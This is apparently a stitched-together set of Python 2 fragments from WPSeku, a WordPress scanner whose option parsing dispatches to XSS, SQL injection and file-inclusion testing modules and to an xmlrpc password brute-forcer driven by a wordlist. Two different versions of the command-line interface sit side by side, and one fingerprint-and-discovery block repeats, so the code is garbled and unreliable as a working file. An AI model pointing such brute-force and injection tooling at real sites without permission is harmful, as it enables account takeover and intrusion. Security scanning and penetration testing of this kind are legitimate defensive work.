print "\t%s --target http://localhost" % path print "\t%s -t http://localhost/wp-admin/post.php -m GET -q \"post=49&action=edit\" [-x,-s,-l]" % path print "\t%s --target http://localhost --brute --wordlist dict.txt" % path print "\t%s --target http://localhost --brute --user test --wordlist dict.txt\n" % path if ext == True: sys.exit() def CheckTarget(self, url): scheme = urlparse.urlsplit(url).scheme netloc = urlparse.urlsplit(url).netloc path = urlparse.urlsplit(url).path if scheme not in ['http', 'https', '']: sys.exit(self.printf.erro('Schme %s not supported' % (scheme))) if netloc == "": return "http://" + path else: return scheme + "://" + netloc + path def Main(self): if len(sys.argv) <= 2: self.Usage(True) try: opts, args = getopt.getopt( self.kwargs, "t:x=:s=:l=:b=:h=:q:u:p:m:c:w:a:r:", [ 'target=', 'xss', 'sql', 'lfi', 'query=', 'brute', 'user='******'proxy=', 'method=', 'cookie=', 'wordlist=', 'agent=', 'redirect=', 'help' ]) except getopt.error as error: pass for o, a in opts: if o in ('-t', '--target'): self.target = self.CheckTarget(a) if o in ('-x', '--xss'): self.xss = True if o in ('-s', '--sql'): self.sql = True if o in ('-l', '--lfi'): self.lfi = True if o in ('-q', '--query'): self.query = a if o in ('-b', '--brute'): self.brute = True if o in ('-u', '--user'): self.user = a if o in ('-p', '--proxy'): self.proxy = a if o in ('-m', '--method'): self.method = a if o in ('-c', '--cookie'): self.cookie = a if o in ('-w', '--wordlist'): self.wordlist = a if o in ('-a', '--agent'): self.agent = a if o in ('-r', '--redirect'): self.redirect = a if o in ('-h', '--help'): self.Usage(True) self.Banner() self.printf.plus('Target: %s' % self.target) self.printf.plus('Starting: %s\n' % (time.strftime('%d/%m/%Y %H:%M:%S'))) print self.agent if not self.agent: self.agent = 'Mozilla/5.0' if not self.proxy: self.proxy = None if not self.cookie: self.cookie = None if not self.redirect: self.redirect = False if not self.user: self.user = "******" # xss attack if self.xss == True: if not self.method: sys.exit(self.printf.erro('Method not exisits!')) if not self.query: sys.exit(self.printf.erro('Not found query')) wpxss.wpxss(self.agent, self.proxy, self.redirect, self.target, self.method, self.query).run() sys.exit() # sql attack if self.sql == True: if not self.method: sys.exit(self.printf.erro('Method not exisits!')) if not self.query: sys.exit(self.printf.erro('Not found query')) wpsql.wpsql(self.agent, self.proxy, self.redirect, self.target, self.method, self.query).run() sys.exit() # lfi attack if self.lfi == True: if not self.method: sys.exit(self.printf.erro('Method not exisits!')) if not self.query: sys.exit(self.printf.erro('Not found query')) wplfi.wplfi(self.agent, self.proxy, self.redirect, self.target, self.method, self.query).run() sys.exit() # attack bruteforce if self.brute == True: if not self.wordlist: sys.exit(self.printf.erro('Not found wordlist!')) wpxmlrpc.wpxmlrpc(self.agent, self.proxy, self.redirect, self.target, self.cookie, self.wordlist, self.user).run() sys.exit() # discovery if self.target: self._.run(self.agent, self.proxy, self.redirect, self.target)
class WPSeku(object): out = wpprint.wpprint() def banner(self): print def usage(self,ext=False): path = os.path.basename(sys.argv[0]) self.banner() print "Usage: {} [options]\n".format(path) print "\t-t --target\tTarget URL (eg: http://site.com)" print "\t-b --brute\tBruteforce login via xmlrpc" print "\t-u --user\tSet username, (df=admin)" print "\t-p --proxy\tSet proxy, (host:port)" print "\t-c --cookie\tSet cookie, (--cookie=\"COOKIE\")" print "\t-a --agent\tSet user-agent, (--agent=\"AGENT\")" print "\t-r --ragent\tSet random user-agent" print "\t-f --redirect\tRedirect target url, (df=true)" print "\t-m --timeout\tSet timeout, (df=None)" print "\t-w --wordlist\tSet wordlist, (df=db/wordlist.txt)" print "\t-h --help\tShow this help and exit\n" print "Examples:" print "\t{} -t http://site.com".format(path) print "\t{} -t http://site.com -b -w wlist.txt".format(path) print "\t{} -t http://site.com/wordpress/ --redirect".format(path) print "\t{} -t http://site.com -b -u test -w wlist.txt\n".format(path) if ext: exit() brute = False user = "******" cookie = None agent = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" redirect = True wordlist = "db/wordlist.txt" proxy = None timeout = None def main(self,kw): if len(sys.argv) <= 2: self.usage(True) try: opts,args = getopt.getopt(kw,"t:u:p:c:a:m:w:frbh:",["target=","brute", "user="******"proxy=","cookie=","timeout=","agent=","ragent","redirect","wordlist=","help"] ) except getopt.error,e: self.usage(True) for opt,arg in opts: if opt in ('-t','--target'): self.target = self.check(arg) if opt in ('-b','--brute'): self.brute = True if opt in ('-u','--user'): self.user = arg if opt in ('-p','--proxy'): self.proxy = arg if opt in ('-c','--cookie'): self.cookie = arg if opt in ('-a','--agent'): self.agent = arg if opt in ('-r','--ragent'): pass if opt in ('-m','--timeout'): self.timeout = arg if opt in ('-f','--redirect'): self.redirect = False if opt in ('-w','--wordlist'): self.wordlist = arg if opt in ('-h','--help'): self.usage(True) # starting self.init() if self.brute == True: wpxmlrpc.wpxmlrpc(agent=self.agent,proxy=self.proxy, redir=self.redirect,time=self.timeout,url=self.target, cookie=self.cookie,wlist=self.wordlist,user=self.user).run() exit() # fingerprint fingerprint.fingerprint(agent=self.agent,proxy=self.proxy, redir=self.redirect,time=self.timeout,url=self.target, cookie=self.cookie).run() # discovery discovery.discovery().run(agent=self.agent,proxy=self.proxy, redir=self.redirect,time=self.timeout,url=self.target, cookie=self.cookie)
fingerprint.fingerprint(agent=self.agent,proxy=self.proxy, redir=self.redirect,time=self.timeout,url=self.target, cookie=self.cookie).run() # discovery discovery.discovery().run(agent=self.agent,proxy=self.proxy, redir=self.redirect,time=self.timeout,url=self.target, cookie=self.cookie) def check(self,url): o = urlsplit(url) u = '' if o.netloc == '': u = 'http://{}'.format(o.path) else: u = '{}://{}{}'.format(o.scheme,o.netloc,o.path) if urlsplit(u).scheme not in ['http','https']: self.banner() exit(WPSeku.out.warning('Scheme \"{}\" not support\n'.format(urlsplit(u).scheme))) return str(u) def init(self): self.banner() WPSeku.out.plus('Target: {}'.format(self.target)) WPSeku.out.plus('Starting: {}\n'.format(time.strftime('%d/%m/%Y %H:%M:%S'))) if __name__ == "__main__": try: WPSeku().main(sys.argv[1:]) except KeyboardInterrupt: exit(wpprint.wpprint().warning('Keyboard interrupt by user'))